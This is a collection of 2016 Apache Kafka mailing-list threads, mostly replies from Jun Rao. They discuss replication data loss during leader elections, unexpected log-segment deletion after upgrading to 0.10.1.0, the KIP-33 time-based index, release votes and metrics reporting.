> > can happen is that a follower first truncates its data up to HW and then
> > immediately becomes the new leader. Since the follower's HW may not be up
> > to date, some previously committed messages could be lost. The second one
> > is https://issues.apache.org/jira/browse/KAFKA-3670. The issue is that
> > controlled

Re: Investigating apparent data loss during preferred replica election

2016-11-18 Thread Jun Rao

Mark,

Thanks for reporting this. First, a clarification. The HW is actually never
advanced until all in-sync followers have fetched the corresponding
message. For example, in step 2, if all follower replicas issue a fetch
request at offset 10, it serves as an indication that all replicas have
received messages up to offset 9. So,only then, the HW is advanced to
offset 10 (which is not inclusive).

I think the problem that you are seeing are probably caused by two known
issues. The first one is https://issues.apache.org/jira/browse/KAFKA-1211.
The issue is that the HW is propagated asynchronously from the leader to
the followers. If the leadership changes multiple time very quickly, what
can happen is that a follower first truncates its data up to HW and then
immediately becomes the new leader. Since the follower's HW may not be up
to date, some previously committed messages could be lost. The second one
is https://issues.apache.org/jira/browse/KAFKA-3670. The issue is that
controlled shutdown and leader balancing can cause leadership to change
more than once quickly, which could expose the data loss problem in the
first issue.

The second issue has been fixed in 0.10.0. So, if you upgrade to that
version or above, it should reduce the chance of hitting the first issue
significantly. We are actively working on the first issue and hopefully it
will be addressed in the next release.

Jun

On Thu, Nov 17, 2016 at 5:39 PM, Mark Smith  wrote:

> Hey folks,
>
> I work at Dropbox and I was doing some maintenance yesterday and it
> looks like we lost some committed data during a preferred replica
> election. As far as I understand this shouldn't happen, but I have a
> theory and want to run it by ya'll.
>
> Preamble:
> * Kafka 0.9.0.1
> * required.acks = -1 (All)
> * min.insync.replicas = 2 (only 2 replicas for the partition, so we
> require both to have the data)
> * consumer is Kafka Connect
> * 1400 topics, total of about 15,000 partitions
> * 30 brokers
>
> I was performing some rolling restarts of brokers yesterday as part of
> our regular DRT (disaster testing) process and at the end that always
> leaves many partitions that need to be failed back to the preferred
> replica. There were about 8,000 partitions that needed moving. I started
> the election in Kafka Manager and it worked, but it looks like 4 of
> those 8,000 partitions experienced some relatively small amount of data
> loss at the tail.
>
> From the Kafka Connect point of view, we saw a handful of these:
>
> [2016-11-17 02:55:26,513] [WorkerSinkTask-clogger-analytics-staging-8-5]
> INFO Fetch offset 67614479952 is out of range, resetting offset
> (o.a.k.c.c.i.Fetcher:595)
>
> I believe that was because it asked the new leader for data and the new
> leader had less data than the old leader. Indeed, the old leader became
> a follower and immediately truncated:
>
> 2016-11-17 02:55:27,237 INFO log.Log: Truncating log
> goscribe.client-host_activity-21 to offset 67614479601.
>
> Given the above production settings I don't know why KC would ever see
> an OffsetOutOfRange error but this caused KC to reset to the beginning
> of the partition. Various broker logs for the failover paint the
> following timeline:
> https://gist.github.com/zorkian/d80a4eb288d40c1ee7fb5d2d340986d6
>
> My current working theory that I'd love eyes on:
>
>   1. Leader receives produce request and appends to log, incrementing
>   LEO, but given the durability requirements the HW is not incremented
>   and the produce response is delayed (normal)
>
>   2. Replica sends Fetch request to leader as part of normal replication
>   flow
>
>   3. Leader increments HW when it STARTS to respond to the Fetch request
>   (per fetchMessages in ReplicaManager.scala), so the HW is updated as
>   soon as we've prepared messages for response -- importantly the HW is
>   updated even though the replica has not yet actually seen the
>   messages, even given the durability settings we've got
>
>   4. Meanwhile, Kafka Connect sends Fetch request to leader and receives
>   the messages below the new HW, but the messages have not actually been
>   received by the replica yet still
>
>   5. Preferred replica election begins (oh the travesty!)
>
>   6. Replica starts the become-leader process and makeLeader removes
>   this partition from partitionMap, which means when the response comes
>   in finally, we ignore it (we discard the old-leader committed
>   messages)
>
>   7. Old-leader starts become-follower process and truncates to the HW
>   of the new-leader i.e. the old-leader has now thrown away data it had
>   committed and given out moments ago
>
>   8. Kafka Connect sends Fetch request to the new-leader but its offset
>   is now greater than the HW of the new-leader, so we get the
>   OffsetOutOfRange error and restart
>
> Can someone tell me whether or not this is plausible? If it is, is there
> a known issue/bug filed for it? I'm not exactly sure what the solution
> is, but it

Re: Segments being deleted too early after upgrading 0.9.0.1 to 0.10.1.0

2016-11-01 Thread Jun Rao

Hi, James,

That's a good point. KAFKA-3802 should cause the log segments to be kept
longer, instead of shorter. So, there is probably something else that's
causing this behavior. Could you try if you can reproduce this? When you do
that, one thing you could try is to set log.segment.delete.delay.ms to a
larger value. This will leave those segments to be deleted as .deleted
files longer. Then, when deletion is triggered, you can check the last
modified time of those .delete files and run the following command to check
the content of the .timeindex file. The content in the .timeindex file
should be empty, which means log retention will be using the last modified
time.

bin/kafka-run-class.sh kafka.tools.DumpLogSegments --files
/tmp/kafka-logs/test-0/.timeindex

Thanks,

Jun

On Mon, Oct 31, 2016 at 5:17 PM, James Brown <jbr...@easypost.com> wrote:

> KAFKA-3802 does seem plausible; I had to restart the brokers again after
> the 0.10.1.0 upgrade to change some JVM settings; maybe that touched the
> mtime on the files? Not sure why that would make them *more* likely to be
> deleted, though, since their mtime should've gone into the future, not into
> the past...
>
> On Mon, Oct 31, 2016 at 5:02 PM, Jun Rao <j...@confluent.io> wrote:
>
> > Hi, James,
> >
> > Thanks for testing and reporting this. What you observed is actually not
> > the expected behavior in 0.10.1 based on the design. The way that
> retention
> > works in 0.10.1 is that if a log segment has at least one message with a
> > timestamp, we will use the largest timestamp in that segment to determine
> > if the segment should be retained. If no message in a segment has a
> > timestamp (which is your case), we will fall back to use the last
> modified
> > time of the segment, which is the old behavior.
> >
> > I tested this locally and didn't see old log segments being deleted
> > immediately after upgrade. It's also a bit weird that you only saw that
> in
> > the leader broker. The retention logic is orthogonal to a replica being a
> > leader or a follower.
> >
> > I am wondering if you could be hitting
> > https://issues.apache.org/jira/browse/KAFKA-3802 ? If not, is there a
> way
> > to reproduce this reliably?
> >
> > Jun
> >
> > On Mon, Oct 31, 2016 at 4:14 PM, James Brown <jbr...@easypost.com>
> wrote:
> >
> > > I just finished upgrading our main production cluster to 0.10.1.0 (from
> > > 0.9.0.1) with an on-line rolling upgrade, and I noticed something
> > strange —
> > > the leader for one of our big partitions just decided to expire all of
> > the
> > > logs from before the upgrade. I have log.retention.hours set to 336 in
> my
> > > config, and the replicas still have data going back to October 17, but
> > > after restarting for 0.10.1.0, the topic leader deleted all segments
> more
> > > than a couple of hours old (approximately 2TB of data on that box).
> > >
> > > inter.broker.protocol.version and log.message.format.version are both
> > still
> > > set to 0.9.0.1 in my config
> > >
> > > Before the upgrade, the oldest available offset in this topic/partition
> > > was 812555925; now it's 848947551.
> > >
> > > I assume this is some bug with upgrading to 0.10.1.0 when the extant
> data
> > > doesn't have any associated timestamps, but it seems, uh, really
> > > unexpected, and if I'd had any consumers which were behind, I could've
> > > ended up losing quite a lot of data here. It's particularly bizarre
> that
> > > this didn't affect anything except the leader (yet).
> > >
> > > It may be that this is expected behavior, but I guess I just assumed
> that
> > > the code would fall back to using the mtime if timestamps were not
> > present
> > > in the log rather than assuming that the timestamp of a given segment
> was
> > > 0. If this is expected behavior, I would recommend adding a specific
> note
> > > the the "Potential breaking changes in 0.10.1.0" section of the manual
> > > indicating that upgrading from 0.9.0.1 might immediately truncate all
> of
> > > your data.
> > >
> > >
> > > Debugging output is below:
> > >
> > >
> > > % kafka-topics.sh --zookeeper localhost:40169 --describe  --topic
> > > easypost.request_log
> > > Topic:easypost.request_log PartitionCount:4 ReplicationFactor:3
> Configs:
> > > Topic: easypost.request_log Partition: 0 Leader: 1 Replicas: 1,4,2 Isr:
> > > 4,2,1
> > > Topic: easypost.request_lo

Re: Segments being deleted too early after upgrading 0.9.0.1 to 0.10.1.0

2016-10-31 Thread Jun Rao

Hi, James,

Thanks for testing and reporting this. What you observed is actually not
the expected behavior in 0.10.1 based on the design. The way that retention
works in 0.10.1 is that if a log segment has at least one message with a
timestamp, we will use the largest timestamp in that segment to determine
if the segment should be retained. If no message in a segment has a
timestamp (which is your case), we will fall back to use the last modified
time of the segment, which is the old behavior.

I tested this locally and didn't see old log segments being deleted
immediately after upgrade. It's also a bit weird that you only saw that in
the leader broker. The retention logic is orthogonal to a replica being a
leader or a follower.

I am wondering if you could be hitting
https://issues.apache.org/jira/browse/KAFKA-3802 ? If not, is there a way
to reproduce this reliably?

Jun

On Mon, Oct 31, 2016 at 4:14 PM, James Brown  wrote:

> I just finished upgrading our main production cluster to 0.10.1.0 (from
> 0.9.0.1) with an on-line rolling upgrade, and I noticed something strange —
> the leader for one of our big partitions just decided to expire all of the
> logs from before the upgrade. I have log.retention.hours set to 336 in my
> config, and the replicas still have data going back to October 17, but
> after restarting for 0.10.1.0, the topic leader deleted all segments more
> than a couple of hours old (approximately 2TB of data on that box).
>
> inter.broker.protocol.version and log.message.format.version are both still
> set to 0.9.0.1 in my config
>
> Before the upgrade, the oldest available offset in this topic/partition
> was 812555925; now it's 848947551.
>
> I assume this is some bug with upgrading to 0.10.1.0 when the extant data
> doesn't have any associated timestamps, but it seems, uh, really
> unexpected, and if I'd had any consumers which were behind, I could've
> ended up losing quite a lot of data here. It's particularly bizarre that
> this didn't affect anything except the leader (yet).
>
> It may be that this is expected behavior, but I guess I just assumed that
> the code would fall back to using the mtime if timestamps were not present
> in the log rather than assuming that the timestamp of a given segment was
> 0. If this is expected behavior, I would recommend adding a specific note
> the the "Potential breaking changes in 0.10.1.0" section of the manual
> indicating that upgrading from 0.9.0.1 might immediately truncate all of
> your data.
>
>
> Debugging output is below:
>
>
> % kafka-topics.sh --zookeeper localhost:40169 --describe  --topic
> easypost.request_log
> Topic:easypost.request_log PartitionCount:4 ReplicationFactor:3 Configs:
> Topic: easypost.request_log Partition: 0 Leader: 1 Replicas: 1,4,2 Isr:
> 4,2,1
> Topic: easypost.request_log Partition: 1 Leader: 4 Replicas: 4,1,2 Isr:
> 4,2,1
> Topic: easypost.request_log Partition: 2 Leader: 5 Replicas: 5,2,3 Isr:
> 5,3,2
> Topic: easypost.request_log Partition: 3 Leader: 3 Replicas: 3,5,2 Isr:
> 5,3,2
>
> (on broker #1):
>
> % ls -l /srv/var/kafka/logs/easypost.request_log-0/ | wc -l
> 25
>
> (on broker #4):
>
> % ls -l /srv/var/kafka/logs/easypost.request_log-0/ | wc -l
> 3391
>
>
> When the actual deletion occurred, there were no errors in the log; just a
> lot messages like
>
> INFO Scheduling log segment 811849601 for log easypost.request_log-0 for
> deletion. (kafka.log.Log)
>
>
> I suspect it's too late to un-do anything related to this, and I don't
> actually think any of our consumers were relying on this data, but I
> figured I'd send along this report and see if anybody else has seen
> behavior like this.
>
> Thanks,
> --
> James Brown
> Engineer
>

Re: [ANNOUNCE] New committer: Jiangjie (Becket) Qin

2016-10-31 Thread Jun Rao

Congratulations, Jiangjie. Thanks for all your contributions to Kafka.

Jun

On Mon, Oct 31, 2016 at 10:35 AM, Joel Koshy  wrote:

> The PMC for Apache Kafka has invited Jiangjie (Becket) Qin to join as a
> committer and we are pleased to announce that he has accepted!
>
> Becket has made significant contributions to Kafka over the last two years.
> He has been deeply involved in a broad range of KIP discussions and has
> contributed several major features to the project. He recently completed
> the implementation of a series of improvements (KIP-31, KIP-32, KIP-33) to
> Kafka’s message format that address a number of long-standing issues such
> as avoiding server-side re-compression, better accuracy for time-based log
> retention, log roll and time-based indexing of messages.
>
> Congratulations Becket! Thank you for your many contributions. We are
> excited to have you on board as a committer and look forward to your
> continued participation!
>
> Joel
>

Re: [VOTE] Add REST Server to Apache Kafka

2016-10-25 Thread Jun Rao

Sorry a typo. -1 instead.

Thanks,

Jun

On Tue, Oct 25, 2016 at 4:24 PM, Jun Rao <j...@confluent.io> wrote:

> +1
>
> Thanks,
>
> Jun
>
> On Tue, Oct 25, 2016 at 2:16 PM, Harsha Chintalapani <ka...@harsha.io>
> wrote:
>
>> Hi All,
>>We are proposing to have a REST Server as part of  Apache Kafka
>> to provide producer/consumer/admin APIs. We Strongly believe having
>> REST server functionality with Apache Kafka will help a lot of users.
>> Here is the KIP that Mani Kumar wrote
>> https://cwiki.apache.org/confluence/display/KAFKA/KIP-80:+
>> Kafka+Rest+Server.
>> There is a discussion thread in dev list that had differing opinions on
>> whether to include REST server in Apache Kafka or not. You can read more
>> about that in this thread
>> http://mail-archives.apache.org/mod_mbox/kafka-dev/201610.mb
>> ox/%3CCAMVt_AyMqeuDM39ZnSXGKtPDdE46sowmqhsXoP-+JMBCUV74Dw@
>> mail.gmail.com%3E
>>
>>   This is a VOTE thread to check interest in the community for
>> adding REST Server implementation in Apache Kafka.
>>
>> Thanks,
>> Harsha
>>
>
>

Re: [VOTE] Add REST Server to Apache Kafka

2016-10-25 Thread Jun Rao

+1

Thanks,

Jun

On Tue, Oct 25, 2016 at 2:16 PM, Harsha Chintalapani 
wrote:

> Hi All,
>We are proposing to have a REST Server as part of  Apache Kafka
> to provide producer/consumer/admin APIs. We Strongly believe having
> REST server functionality with Apache Kafka will help a lot of users.
> Here is the KIP that Mani Kumar wrote
> https://cwiki.apache.org/confluence/display/KAFKA/KIP-
> 80:+Kafka+Rest+Server.
> There is a discussion thread in dev list that had differing opinions on
> whether to include REST server in Apache Kafka or not. You can read more
> about that in this thread
> http://mail-archives.apache.org/mod_mbox/kafka-dev/201610.mbox/%3CCAMVt_
> aymqeudm39znsxgktpdde46sowmqhsxop-+jmbcuv7...@mail.gmail.com%3E
>
>   This is a VOTE thread to check interest in the community for
> adding REST Server implementation in Apache Kafka.
>
> Thanks,
> Harsha
>

Re: [kafka-clients] [VOTE] 0.10.1.0 RC3

2016-10-17 Thread Jun Rao

Thanks for preparing the release. Verified quick start on scala 2.11
binary. +1

Jun

On Fri, Oct 14, 2016 at 4:29 PM, Jason Gustafson  wrote:

> Hello Kafka users, developers and client-developers,
>
> One more RC for 0.10.1.0. We're hoping this is the final one so that we
> can meet the release target date of Oct. 17 (Monday). Please let me know as
> soon as possible if you find any major problems.
>
> Release plan: https://cwiki.apache.org/confluence/display/KAFKA/Rele
> ase+Plan+0.10.1.
>
> Release notes for the 0.10.1.0 release:
> http://home.apache.org/~jgus/kafka-0.10.1.0-rc3/RELEASE_NOTES.html
>
> *** Please download, test and vote by Monday, Oct 17, 5pm PT
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> http://home.apache.org/~jgus/kafka-0.10.1.0-rc3/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/
>
> * Javadoc:
> http://home.apache.org/~jgus/kafka-0.10.1.0-rc3/javadoc/
>
> * Tag to be voted upon (off 0.10.1 branch) is the 0.10.1.0-rc3 tag:
> https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=
> 50f30a44f31fca1bd9189d2814388d51bd56b06b
>
> * Documentation:
> http://kafka.apache.org/0101/documentation.html
>
> * Protocol:
> http://kafka.apache.org/0101/protocol.html
>
> * Tests:
> Unit tests: https://builds.apache.org/job/kafka-0.10.1-jdk7/71/
> System tests: http://testing.confluent.io/confluent-kafka-
> 0-10-1-system-test-results/?prefix=2016-10-13--001.
> 1476369986--apache--0.10.1--ee212d1/
>
> (Note that these tests do not include a couple patches merged today. I
> will send links to updated test builds as soon as they are available)
>
> Thanks,
>
> Jason
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To post to this group, send email to kafka-clie...@googlegroups.com.
> Visit this group at https://groups.google.com/group/kafka-clients.
> To view this discussion on the web visit https://groups.google.com/d/
> msgid/kafka-clients/CAJDuW%3DBm0HCOjiHiwnW3WJ_i5u_0e4J2G_
> mZ_KBkB_WEmo7pNg%40mail.gmail.com
> 
> .
> For more options, visit https://groups.google.com/d/optout.
>

Re: KIP-33 Opt out from Time Based indexing

2016-09-06 Thread Jun Rao

Jan,

For the time rolling issue, Jiangjie has committed a fix (
https://issues.apache.org/jira/browse/KAFKA-4099) to trunk. Perhaps you can
help test out trunk and see if there are any other issues related to
time-based index?

Thanks,

Jun

On Mon, Sep 5, 2016 at 11:52 PM, Jan Filipiak <jan.filip...@trivago.com>
wrote:

> Hi Jun,
>
> sorry for the late reply. Regarding B, my main concern was just complexity
> of understanding what's going on.
> As you can see it took me probably some 2 days or so, to fully grab all
> the details in the implementation and what
> the impacts are. Usually I prefer to turn things I don't use off, so I
> don't have to bother. Log Append time will work for me.
>
> Rolling logs was my main concern. The producer can specify the timestamp
> and we use epoch inside the message, I'd bet money,
> people in the company would have put this epoch also in the produce
> record. => rollings logs as the broker thinks its millis.
> So that would probably have caused us at least one outage if a big
> producer had upgraded and done this, IMO likely mistake.
>
> Id just hoped for a more obvious kill-switch, so I didn’t need to bother
> that much.
>
> Best Jan
>
>
>
>
>
> On 29.08.2016 19:36, Jun Rao wrote:
>
>> Jan,
>>
>> For the usefulness of time index, it's ok if you don't plan to use it.
>> However, I do think there are other people who will want to use it. Fixing
>> an application bug always requires some additional work. Intuitively,
>> being
>> able to seek back to a particular point of time for replay is going to be
>> much more efficient than always replaying from the very beginning,
>> especially when the log is retained for a long period of time. Sure, if
>> you
>> want to have more confidence, you want to rewind a bit conservatively. But
>> being able to rewind an extra hour makes a big difference from having to
>> rewind all to way to 7 days or however long the retention time is.
>>
>> For the OffsetRequest, I actually agree with you that it's useful. People
>> can use that to find the first and the last offset and the offset based on
>> a specific point in time. The part that's a bit awkward with OffsetRequest
>> is that it's based on the last modified time of the log segment, which
>> makes it imprecise (precision is at the segment level, not message level)
>> and non-deterministic (last modified time may change). Another awkwardness
>> is that it supports returning a list of offsets after a specified
>> timestamp. We did that simply because timestamp was only at the segment
>> level then. So, our plan is to replace OffsetRequest with a new one. It
>> will give you the same functionality: find the first and the last offset
>> and the offset based on a specific point in time. It will just be better
>> since it's more precise and more deterministic. For your use case, it
>> seems
>> that you don't care about message creation time. Then, it's possible for
>> you to configure the broker with the log append time. Whether this should
>> be default at the Kafka level is debatable, but it won't prevent your use
>> case.
>>
>> For your suggesting on refactoring, I still want to understand how
>> necessary it is. Your main concerns so far seem to be.
>> (a) Impact on rolling log segments.
>> (b) Time-based index is not useful for me.
>>
>> Item (a) is a good point. Thanks for that. We will fix it. Item (b), I
>> have
>> given my view on this above. Are there any other things that you think
>> that
>> having a time-based index will hurt?
>>
>> Thanks,
>>
>> Jun
>>
>> On Fri, Aug 26, 2016 at 3:41 PM, Jan Filipiak <jan.filip...@trivago.com>
>> wrote:
>>
>> Hi Jun,
>>>
>>> thanks for taking the time to answer on such a detailed level. You are
>>> right Log.fetchOffsetByTimestamp works, the comment is just confusing
>>> "// Get all the segments whose largest timestamp is smaller than target
>>> timestamp" wich is apparently is not what takeWhile does (I am more on
>>> the Java end of things, so I relied on the comment).
>>>
>>> Regarding the frequent file rolling i didn't think of Logcompaction but
>>> that indeed is a place where  can hit the fan pretty easy. especially
>>> if you don't have many updates in there and you pass the timestamp along
>>> in
>>> a kafka-streams application. Bootstrapping a new application then indeed
>>> could produce quite a few old messages kicking this logrolling of until a
>>> recent message appears. I guess that makes it a prac

Re: Kafka 0.10.0 MetricsReporter implementation only reporting zeros

2016-09-06 Thread Jun Rao

Michael,

One thing to be aware is that if the producer stops sending messages, some
of the metrics will be reset to 0 after the metric window elapses. Do you
see metric values reported in the reporter different from that in jconsole?

Thanks,

Jun

On Tue, Sep 6, 2016 at 3:03 PM, Michael Ross  wrote:

> I have a very simple Metrics Reporter that implements the Kafka 0.10.0
> MetricsReporter interface, that takes in the metrics as a parameter and
> logs them. When a producer starts to send messages, I can see that it is
> correctly configured to use the Metrics Reporter I created because it
> starts to log, but it only seems to log in the beginning around
> initialization and almost every value seems to be 0.0 or negative infinity
> (besides available buffer, metadata-age, and the metric count starts at 1.0
> after initialization). It also stops receiving metrics after a very short
> time after startup. When looking at the JMX Metrics Reporting on a server
> running my Kafka setup, all of the values exist, which makes it clear that
> the 0.0s are not expected output.
>
> After exploring this problem for a while, it looks like this has nothing
> to do with the implementation of the Metrics Reporter and more to do with
> some configuration issue or understanding around how Metrics Reporting
> works.
>
> Thanks,
>
> Mike
>

Re: KIP-33 Opt out from Time Based indexing

2016-08-29 Thread Jun Rao

Jiangjie,

Good point on the time index format related to uncompressed messages. It
does seem that indexing based on file position requires a bit more
complexity. Since the time index is going to be used infrequently, having a
level of indirection doesn't seem a big concern. So, we can leave the logic
as it is.

Do you plan to submit a patch to fix the time-based rolling issue?

Thanks,

Jun

On Fri, Aug 26, 2016 at 3:23 PM, Becket Qin <becket@gmail.com> wrote:

> Jun,
>
> Good point about new log rolling behavior issue when move replicas. Keeping
> the old behavior sounds reasonable to me.
>
> Currently the time index entry points to the exact shallow message with the
> indexed timestamp, are you suggesting we change it to point to the starting
> offset of the appended batch(message set)? That doesn't seem to work for
> truncation. For example, imagine an uncompressed message set [(m1,
> offset=100, timestamp=100, position=1000), (m2, offset=101,timestamp=105,
> position=1100)], if we build the time index based on the starting offset of
> this message set, the index entry would be (105, 1000), later on when log
> is truncated, and m2 is truncated but m1 is not (this is possible for a
> uncompressed message set) in this case, we will not delete the time index
> entry because it is technically pointing to m1. Pointing to the end of the
> batch will not work either because then search by timestamp would miss m2.
>
> I am not sure if it is worth doing, but if we are willing to change the
> semantic to let the time index entry not point to the exact shallow
> message. I am thinking maybe we should just switch the semantic to the very
> original one, i.e. time index only means "Max timestamp up util this
> offset", which is also aligned with offset index entry.
>
> Thanks,
>
> Jiangjie (Becket) Qin
>
> On Fri, Aug 26, 2016 at 10:29 AM, Jun Rao <j...@confluent.io> wrote:
>
> > Jiangjie,
> >
> > I am not sure about changing the default to LogAppendTime since
> CreateTime
> > is probably what most people want. It also doesn't solve the problem
> > completely. For example, if you do partition reassignment and need to
> copy
> > a bunch of old log segments to a new broker, this may cause log rolling
> on
> > every message.
> >
> > Another alternative is to just keep the old time rolling behavior, which
> is
> > rolling based on the create time of the log segment. I had two use cases
> of
> > time-based rolling in mind. The first one is for users who don't want to
> > retain a message (say sensitive data) in the log for too long. For this,
> > one can set a time-based retention. If the log can roll periodically
> based
> > on create time, it will freeze the largest timestamp in the rolled
> segment
> > and cause it to be deleted when the time limit has been reached. Rolling
> > based on the timestamp of the first message doesn't help much here since
> > the retention is always based on the largest timestamp. The second one is
> > for log cleaner to happen quicker. Rolling logs periodically based on
> > create time will also work. So, it seems that if we preserve the old time
> > rolling behavior, we won't lose much functionality, but will avoid the
> > corner case where the logs could be rolled on every message. What do you
> > think?
> >
> > About storing file position in the time index, I don't think it needs to
> > incur overhead during append. At the beginning of append, we are already
> > getting the end position of the log (for maintaining the offset index).
> We
> > can just keep track of that together with the last seen offset. Storing
> the
> > position has the slight benefit that it avoids another indirection and
> > seems more consistent with the offset index. It's worth thinking through
> > whether this is better. If we want to change it, it's better to change it
> > now than later.
> >
> > Thanks,
> >
> > Jun
> >
> > On Thu, Aug 25, 2016 at 6:30 PM, Becket Qin <becket@gmail.com>
> wrote:
> >
> > > Hi Jan,
> > >
> > > It seems your main concern is for the changed behavior of time based
> log
> > > rolling and time based retention. That is actually why we have two
> > > timestamp types. If user set the log.message.timestamp.type to
> > > LogAppendTime, the broker will behave exactly the same as they were,
> > except
> > > the rolling and retention would be more accurate and independent to the
> > > replica movements.
> > >
> > > The log.message.timestam.max.difference.ms is only useful when users
> are
> > > using Creat

Re: KIP-33 Opt out from Time Based indexing

2016-08-29 Thread Jun Rao

g that is still there. (Maybe even redump from hadoop
> in extreme cases) ironically causing the log to roll all the time (as you
> probably publish to a new topic and have the streams application use both)
> :(
>
> As you can see, even though the users can seek, if they want to create
> proper numbers, Billing information eg. They are in trouble, and giving
> them this index will just make them implement the wrong solution! It boils
> down to: this index is not the kafka way of doing things. The index can
> help the second approach but usually one chooses the confidence interval =
> as much as one can get.
>
> Then the last thing. "OffsetRequest is a legacy request. It's awkward to
> use and we plan to deprecate it over time". You got to be kidding me. It
> was wired to get the byteposition back then, but getting the offsets is
> perfectly reasonable and one of the best things in the world. want to know
> how your stream looked at a specific point in time? get start and end
> offset, fetch whenever you like, you get an perfect snapshot in wall time.
> this is usefull for compacted topis aswell as streaming topics. Offsets are
> a well known thing in kafka and in no way awkward as its monotonically
> increasing property is just great.
>
> For seeking the log based on a confidence interval (the only chance you
> get in non-key logs reprocessing) one can also bisect the log from the
> client. As the case is rare it is intensive and causes at least a few
> hundreds seeks for bigger topics. but I guess the broker does these extra
> for the new index file now.
>
> This index, I feel is just not following the whole "kafka-way". Can you
> suggest on the proposed re-factoring? what are the chance to get it
> upstream if I could pull it off? (unlikely)
>
> Thanks for all the effort you put in into listening to my concerns. highly
> appreciated!
>
> Best Jan
>
>
>
>
> On 25.08.2016 23:36, Jun Rao wrote:
>
> Jan,
>
> Thanks a lot for the feedback. Now I understood your concern better. The
> following are my comments.
>
> The first odd thing that you pointed out could be a real concern.
> Basically, if a producer publishes messages with really old timestamp, our
> default log.roll.hours (7 days) will indeed cause the broker to roll a log
> on ever message, which would be bad. Time-based rolling is actually used
> infrequently. The only use case that I am aware of is that for compacted
> topics, rolling logs based on time could allow the compaction to happen
> sooner (since the active segment is never cleaned). One option is to change
> the default log.roll.hours to infinite and also document the impact on
> changing log.roll.hours. Jiangjie, what do you think?
>
> For the second odd thing, the OffsetRequest is a legacy request. It's
> awkward to use and we plan to deprecate it over time. That's why we haven't
> change the logic in serving OffsetRequest after KIP-33. The plan is to
> introduce a new OffsetRequest that will be exploiting the time based index.
> It's possible to have log segments with non-increasing largest timestamp.
> As you can see in Log.fetchOffsetsByTimestamp(), we simply iterate the
> segments in offset order and stop when we see the target timestamp.
>
> For the third odd thing, one of the original reasons why the time-based
> index points to an offset instead of the file position is that it makes
> truncating the time index to an offset easier since the offset is in the
> index. Looking at the code, we could also store the file position in the
> time index and do truncation based on position, instead of offset. It
> probably has a slight advantage of consistency between the two indexes and
> avoiding another level of indirection when looking up the time index.
> Jiangjie, have we ever considered that?
>
> The idea of log.message.timestamp.difference.max.ms is to prevent the
> timestamp in the published messages to drift too far away from the current
> timestamp. The default value is infinite though.
>
> Lastly, for the usefulness of time-based index, it's actually a feature
> that the community wanted and voted for, not just for Confluent customers.
> For example, being able to seek to an offset based on timestamp has been a
> frequently asked feature. This can be useful for at least the following
> scenarios: (1) If there is a bug in a consumer application, the user will
> want to rewind the consumption after fixing the logic. In this case, it's
> more convenient to rewind the consumption based on a timestamp. (2) In a
> multi data center setup, it's common for people to mirror the data from one
> Kafka cluster in one data center to another cluster in a different data
> center. If one data center fails, people want to be

Re: KIP-33 Opt out from Time Based indexing

2016-08-26 Thread Jun Rao

n the middle of an uncompressed
> message set, we may need to calculate the physical position for that
> message. This is doable but could potentially be an overhead for each
> append and adding some complexity. Given that OffsetRequest is supposed to
> be a pretty infrequent request, it is probably OK to do the secondary
> lookup but save the work on each append.
>
> Jun has already mentioned a few use cases for searching by timestamp. At
> LinkedIn we also have several such use cases where people want to rewind
> the offsets to a certain time and reprocess the streams.
>
> @Jun, currently we are using CreateTime as the default value for
> log.message.timestamp.type. I am wondering would it be less surprising if
> we change the default value to LogAppendTime so that the previous behavior
> is maintained, because for users it would be bad if upgrading cause their
> message got deleted due the change of the behavior. What do you think?
>
> Thanks,
>
> Jiangjie (Becket) Qin
>
>
>
>
>
> On Thu, Aug 25, 2016 at 2:36 PM, Jun Rao <j...@confluent.io> wrote:
>
> > Jan,
> >
> > Thanks a lot for the feedback. Now I understood your concern better. The
> > following are my comments.
> >
> > The first odd thing that you pointed out could be a real concern.
> > Basically, if a producer publishes messages with really old timestamp,
> our
> > default log.roll.hours (7 days) will indeed cause the broker to roll a
> log
> > on ever message, which would be bad. Time-based rolling is actually used
> > infrequently. The only use case that I am aware of is that for compacted
> > topics, rolling logs based on time could allow the compaction to happen
> > sooner (since the active segment is never cleaned). One option is to
> change
> > the default log.roll.hours to infinite and also document the impact on
> > changing log.roll.hours. Jiangjie, what do you think?
> >
> > For the second odd thing, the OffsetRequest is a legacy request. It's
> > awkward to use and we plan to deprecate it over time. That's why we
> haven't
> > change the logic in serving OffsetRequest after KIP-33. The plan is to
> > introduce a new OffsetRequest that will be exploiting the time based
> index.
> > It's possible to have log segments with non-increasing largest timestamp.
> > As you can see in Log.fetchOffsetsByTimestamp(), we simply iterate the
> > segments in offset order and stop when we see the target timestamp.
> >
> > For the third odd thing, one of the original reasons why the time-based
> > index points to an offset instead of the file position is that it makes
> > truncating the time index to an offset easier since the offset is in the
> > index. Looking at the code, we could also store the file position in the
> > time index and do truncation based on position, instead of offset. It
> > probably has a slight advantage of consistency between the two indexes
> and
> > avoiding another level of indirection when looking up the time index.
> > Jiangjie, have we ever considered that?
> >
> > The idea of log.message.timestamp.difference.max.ms is to prevent the
> > timestamp in the published messages to drift too far away from the
> current
> > timestamp. The default value is infinite though.
> >
> > Lastly, for the usefulness of time-based index, it's actually a feature
> > that the community wanted and voted for, not just for Confluent
> customers.
> > For example, being able to seek to an offset based on timestamp has been
> a
> > frequently asked feature. This can be useful for at least the following
> > scenarios: (1) If there is a bug in a consumer application, the user will
> > want to rewind the consumption after fixing the logic. In this case, it's
> > more convenient to rewind the consumption based on a timestamp. (2) In a
> > multi data center setup, it's common for people to mirror the data from
> one
> > Kafka cluster in one data center to another cluster in a different data
> > center. If one data center fails, people want to be able to resume the
> > consumption in the other data center. Since the offsets are not
> preserving
> > between the two clusters through mirroring, being able to find a starting
> > offset based on timestamp will allow the consumer to resume the
> consumption
> > without missing any messages and also not replaying too many messages.
> >
> > Thanks,
> >
> > Jun
> >
> >
> > On Wed, Aug 24, 2016 at 5:05 PM, Jan Filipiak <jan.filip...@trivago.com>
> > wrote:
> >
> > > Hey Jun,
> > >
> > > I go and try again :), wrote the

Re: Networking errors and durability settings

2016-08-26 Thread Jun Rao

Bryan,

Were there multiple brokers losing ZK session around the same time? There
is one known issue https://issues.apache.org/jira/browse/KAFKA-1211.
Basically, if the leader changes too quickly, it's possible for a follower
